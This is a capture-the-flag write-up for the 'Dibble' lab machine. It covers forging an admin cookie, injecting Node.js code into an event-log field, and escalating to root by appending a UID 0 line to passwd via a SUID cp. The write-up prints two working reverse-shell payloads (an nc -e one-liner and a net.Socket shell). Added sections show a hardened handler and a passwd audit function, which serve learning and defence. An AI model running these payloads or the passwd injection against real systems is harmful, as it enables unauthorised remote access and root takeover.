Dibble

Writeup for Dibble from offsec Proving Grounds

Information Gathering

sudo nmapAutomator.sh 192.168.204.110 all

Service Enumeration

MongoDB (Port 27017)

Authentication is not needed to connect to MongoDB.

Nothing significant was found.

FTP (Port 21)

FTP was unresponsive even though anonymous login was allowed.

HTTP (Port 80)

Simple webpage; we checked out the directories listed in the robots.txt file found during earlier enumeration.

Tried creating an account, but it didn't seem to give more access.

HTTP (Port 3000)

We register an account as test:test.

There was a view event logs tab.

Tried registering a new event, but it seems like we need to be an admin to update event logs.

There is a high chance the website checks which user we are via cookies.

We can check to see if there are any existing cookies.

The userLevel cookie seems to be URL encoded so after decoding it online, we get a base64 string.

ZGVmYXVsdA%3D%3D -> ZGVmYXVsdA==

We can decode the base64 string and we get default.

We can try encoding the admin string using base64 to see if this will let us post new events.

We use the -n flag because echo by default adds a newline character at the end of the string, which we do not want to encode.

After updating the cookie value, we are able to post new events.

Exploit

Tested by supplying a simple math operation to see if it would evaluate.

From our earlier enumeration, we know that this is running Node.js, so maybe we can inject some Node.js code.

Tried the first payload to get a reverse shell, but it didn't work.

require('child_process').exec('nc -e cmd 192.168.49.204 80')

Turns out it got evaluated to [object Object].

We try another payload and this time it works.

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(21, "192.168.49.204", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
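The root cause, as an added example that is not the Dibble application's code: an event handler that evaluates the submitted text behaves exactly as the writeup observed ("7*6" renders as 42, an expression that yields an object renders as "[object Object]"). Beside it is a hardened handler that treats the field as data, and a small whitelist parser for the case where the feature genuinely needs arithmetic, so that eval never sees user input. Function names and the 200-character limit are assumptions for this example.

```javascript
// Added example, not from the writeup or the target application.

// Vulnerable shape: the message is handed to eval and the result is
// stringified into the page. This is why an expression returning an object
// showed up as "[object Object]" in the event log.
function renderEventVulnerable(message) {
  return String(eval(message)); // eslint-disable-line no-eval
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened shape: validate type and length, then escape for HTML output.
// The message is never interpreted as code.
function renderEventSafe(message) {
  if (typeof message !== "string" || message.length > 200) {
    throw new TypeError("invalid event message");
  }
  return escapeHtml(message);
}

// If the application really wants "7*6" to display 42, evaluate a restricted
// grammar (numbers, + - * /, parentheses) with a hand-written parser instead
// of reaching for eval. Anything outside that grammar is rejected up front.
function evaluateArithmetic(expr) {
  if (typeof expr !== "string" || !/^[\d\s+\-*/().]+$/.test(expr)) {
    throw new TypeError("not an arithmetic expression");
  }
  let pos = 0;
  const skipWs = () => { while (pos < expr.length && /\s/.test(expr[pos])) pos++; };
  const peek = () => { skipWs(); return expr[pos]; };
  function number() {
    skipWs();
    const m = /^\d+(\.\d+)?/.exec(expr.slice(pos));
    if (!m) throw new SyntaxError("number expected at " + pos);
    pos += m[0].length;
    return parseFloat(m[0]);
  }
  function factor() {
    const c = peek();
    if (c === "(") {
      pos++;
      const v = expression();
      if (peek() !== ")") throw new SyntaxError("missing )");
      pos++;
      return v;
    }
    if (c === "-") { pos++; return -factor(); }
    return number();
  }
  function term() {
    let v = factor();
    for (;;) {
      const op = peek();
      if (op !== "*" && op !== "/") return v;
      pos++;
      const r = factor();
      v = op === "*" ? v * r : v / r;
    }
  }
  function expression() {
    let v = term();
    for (;;) {
      const op = peek();
      if (op !== "+" && op !== "-") return v;
      pos++;
      const r = term();
      v = op === "+" ? v + r : v - r;
    }
  }
  const result = expression();
  skipWs();
  if (pos !== expr.length) throw new SyntaxError("unexpected input at " + pos);
  return result;
}
```

The detection angle follows from the same observation: event-log entries that contain `require(`, `child_process`, or function-expression syntax where free text is expected are a strong signal that the field is being probed, and the "[object Object]" rendering is itself a side effect worth alerting on.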

Privesc

Running linpeas, we see that cp has SUID bit set.

We can follow this guy's guide on how to escalate privileges with the cp command.

openssl passwd -1 -salt ignite bob

echo 'bob:$1$ignite$VRvGqpGVibx/r9NPdLLTF1:0:0:root:/root:/bin/bash' >> passwd
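What the defender should be looking for after this step, as an added example (not part of the writeup): the appended line creates a second UID 0 account and puts a real hash into passwd instead of the usual "x" placeholder for /etc/shadow. Both are cheap to detect by parsing passwd(5) text. The sample file, the function names and the extra "user1" entry are constructed for this example; the bob line is the one the writeup adds.

```javascript
// Added example, not from the writeup. Parses passwd(5) text and returns the
// usernames of entries that should not be there on a healthy host.
function parsePasswd(text) {
  return text
    .split(/\r?\n/)
    .filter((line) => line.trim() !== "" && !line.startsWith("#"))
    .map((line) => {
      const f = line.split(":");
      if (f.length !== 7) return null; // malformed entry; a real audit would report it too
      return { user: f[0], pw: f[1], uid: Number(f[2]), gid: Number(f[3]),
               gecos: f[4], home: f[5], shell: f[6] };
    })
    .filter(Boolean);
}

// Any account other than root that carries UID 0 is a second root login.
function extraRootAccounts(text) {
  return parsePasswd(text)
    .filter((e) => e.uid === 0 && e.user !== "root")
    .map((e) => e.user);
}

// Password field should be "x" (hash lives in /etc/shadow) or a locked marker
// ("*" / "!..."). A hash here means login works straight from passwd, which is
// exactly what the openssl passwd line above produces.
function nonShadowedAccounts(text) {
  return parsePasswd(text)
    .filter((e) => e.pw !== "x" && !/^[*!]/.test(e.pw))
    .map((e) => e.user);
}

function auditPasswd(text) {
  return { extraRoot: extraRootAccounts(text), nonShadowed: nonShadowedAccounts(text) };
}

// Constructed sample: stock entries plus the line the privesc step appends.
const SAMPLE_PASSWD = [
  "root:x:0:0:root:/root:/bin/bash",
  "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
  "user1:x:1000:1000:user1:/home/user1:/bin/bash",
  "bob:$1$ignite$VRvGqpGVibx/r9NPdLLTF1:0:0:root:/root:/bin/bash",
].join("\n");
```

Running auditPasswd over a copy of /etc/passwd in a periodic job, or diffing against a known-good baseline, catches this technique regardless of which SUID binary was used to write the file; the SUID bit on cp is the enabler, the passwd change is the durable artifact.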
